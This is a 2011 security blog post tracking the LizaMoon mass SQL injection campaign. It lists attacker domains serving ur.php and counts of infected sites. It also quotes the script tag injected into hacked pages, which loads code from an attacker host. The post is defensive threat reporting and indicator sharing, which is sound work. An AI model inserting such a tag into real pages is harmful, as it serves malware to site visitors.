The Latest in IT Security

LizaMoon SQL injections (ur.php) – Now vcvsta.com, asweds.com, etc.

26
May
2011

A couple of months ago the Lizamoon malware / Mass SQL injection was getting a lot of news coverage that it could be affecting hundreds of thousands of sites.

The media mostly forgot about it, but we kept tracking those attacks and they are continuing at full force, but using different domain names.

For example, the domain http://vcvsta.com/ur.php caused 1.5k sites to get blacklisted by Google:

Yes, this site has hosted malicious software over the past 90 days. It infected 1583 domain(s), including chamc.co.kr/, mugunghwa.or.kr/, humour.com/.

While http://statsl.com/ur.php, caused more than 600 sites to get blacklisted and searching on Google for http://asweds.com/ur.php on ASP sites returns more than 2k pages.

Yes, this site has hosted malicious software over the past 90 days. It infected 622 domain(s), including rozanaspokesman.com/, 89fm.com.br/, phhc.co.kr/.

So what is going on? The attacks are still at full force, but using different domains names to distribute the malware (always registered by [email protected]). A hacked site will have the following code added to their pages (or very similar):

<script src=http://asweds.com/ur.php>..

These are some of the new domains used in this attack:

http://vcvsta.com/ur.php

http://asweds.com/ur.php

http://statsl.com/ur.php

http://general-st.info/ur.php

http://online-guest.info/ur.php

http://google-stats44.info/ur.php

http://booksolo.com (showing up on hacked sites – seo spam)
http://bookvila.com (showing up on hacked sites – seo spam)
http://booktuba.com (showing up on hacked sites – seo spam)
http://bookavio.com (showing up on these hacked sites – seo spam)
http://booknunu.com (same as above)

And some of the old domains being used on for these mass SQL injections:

http://tadygus.com/ur.php

http://lizamoon.com/ur.php

http://alisa-carter.com/ur.php

http://google-stats50.info/ur.php

http://pop-stats.info/ur.php

http://sol-stats.info/ur.php

http://online-guest.info/ur.php

http://google-stats48.info/ur.php

http://google-stats49.info/ur.php

http://google-stats50.info/ur.php

http://milapop.com/ur.php

http://multi-stats.info/ur.php

http://general-st.info/ur.php

http://worid-of-books.com/ur.php

http://google-server12.info/ur.php

http://stats-master111.info/ur.php

We posted more details on these types of attacks when the first one hit almost a year ago: Mass infection of IIS/ASP sites – robint.us

A good way to check if your site is infected, is by using our malware scanner. If you see IIS:4 as the malware code, you know what happened.

Leave a reply


Categories

TUESDAY, APRIL 23, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments